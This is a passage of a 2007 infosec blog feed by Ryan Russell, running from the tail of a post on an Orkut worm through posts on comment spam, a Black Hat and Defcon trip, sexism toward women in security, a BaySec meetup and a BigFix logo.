group, too:<br /><br /><A HREF="http://www.orkut.com/Community.aspx?cmm=44001818">Infectados pelo Vírus do Orkut</A>.<br /><br />Owner of the group is a new-looking account named "Virus do Orkut". Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com6tag:blogger.com,1999:blog-18579416.post-27172944224251430732007-10-30T08:23:00.000-07:002007-10-30T08:25:51.612-07:00Comment spammersThe comment spammers have finally found me. I have tried deleting the comments manually, but they just post a couple more every day. I've turned on CAPTCHAs, we'll see how that works. I'm loath to put any barriers in for people wanting to comment, so sorry about that.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com1tag:blogger.com,1999:blog-18579416.post-53515555865121813022007-07-31T10:08:00.000-07:002007-07-31T10:12:47.798-07:00Off to vegas 2007I'm on my way to Las Vegas for Black Hat & Defcon. For Black Hat, it looks like I'm doing a booksigning on Wednesday at 4:30. BigFix is hosting the Gala at 6:00 on Wednesday as well, so I will be putting in an appearance. Please come say hi if you're around. I will also be at Defcon, but good luck spotting me in the crowd there if you don't already know what I look like.<br /><br />I look forward to catching up with friends I only get to see at cons.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-51815014749158352862007-07-19T10:36:00.000-07:002008-05-03T14:21:45.021-07:00The Ladies of InfosecI was at an event not long ago, and the woman in the group was really pissed. In a room full of nothing but security geeks, someone asked her "Oh, do you do security work?"<br /><br />This didn't happen with any of the guys. The question they got was "Where do you work?"<br /><br />I was thinking about this today, and I realized that every woman I know who works in infosec has told me a similar story. That might be a slight exaggeration, but not much. Literally every one I can think of right now has told me one of these stories.<br /><br />They get things like:<br /><ul><li>Are you here with your boyfriend?</li><li>She used to be a man</li><li>Take your shirt off</li></ul>Yes, sadly I have heard jerks yell out "take your shirt off" when a woman was trying to give a talk.<br /><br />How much do women hate this? You can read what <a href="http://archives.neohapsis.com/archives/isn/2004-q2/0059.html">Raven thinks</a> about it.<br /><br />Let me tell you a little about this particular woman in question that reminded me of all this. She has worked in some of the most important software companies in the world, in the security groups. She has worked at at least two security companies that I know of. Pick just about any well-know security male, and they know who she is and they respect her work.<br /><br />If you've been paying attention to the infosec world, you probably know who I'm talking about. Keep it to yourself, because this particular woman is not the point.<br /><br />I have met a number of women at various conferences. I'd look really foolish if I went around assuming they weren't attendees or didn't know what they were doing. I've met a woman who works for the CIA. I've met one who was a heavy-duty cryptographer. I've met one who does BGP vulnerability research. Yes, the women are rare. Staring and asking stupid questions doesn't help improve that.<br /><br />Because of how hostile the infosec world is to women, the ones who manage to survive tend to really love what they do, and have worked very hard to stay in the field. This may mean that the woman you just met is better at security than 90% of the men. That probably includes you (and I'll happily concede that includes me.)<br /><br />Keep that in mind.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com9tag:blogger.com,1999:blog-18579416.post-81842933530893298802007-07-18T13:36:00.000-07:002007-07-18T13:41:33.622-07:00BaySec 3 Tonight!BaySec 3 is tonight, July 18 2007.<br /><br />Per <a href="http://rdist.root.org/2007/07/11/next-baysec-july-18-at-oneills/">Nate</a>:<br />July 18th, 7-11 pm or so. <br />O'Neills Irish Pub<br />747 3rd St (at King)<br /><a class="moz-txt-link-freetext" href="http://www.tisoneills.com/">http://www.tisoneills.com</a>Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-82436420957824238232007-07-17T16:46:00.000-07:002007-07-17T16:51:26.943-07:00The BigFix logo<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bigblog.typepad.com/bigfix_the_relay/2007/07/cubism.html"><img style="cursor: pointer; width: 400px;" src="http://farm2.static.flickr.com/1083/801077200_d8e05b8d49.jpg?v=0" alt="" border="0" /></a><br />I promised to keep my work blogging on the the <a href="http://bigblog.typepad.com/">work blog</a>, unless I thought I had been particularly clever. I think <a href="http://bigblog.typepad.com/bigfix_the_relay/2007/07/cubism.html">this one</a> qualifies.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com1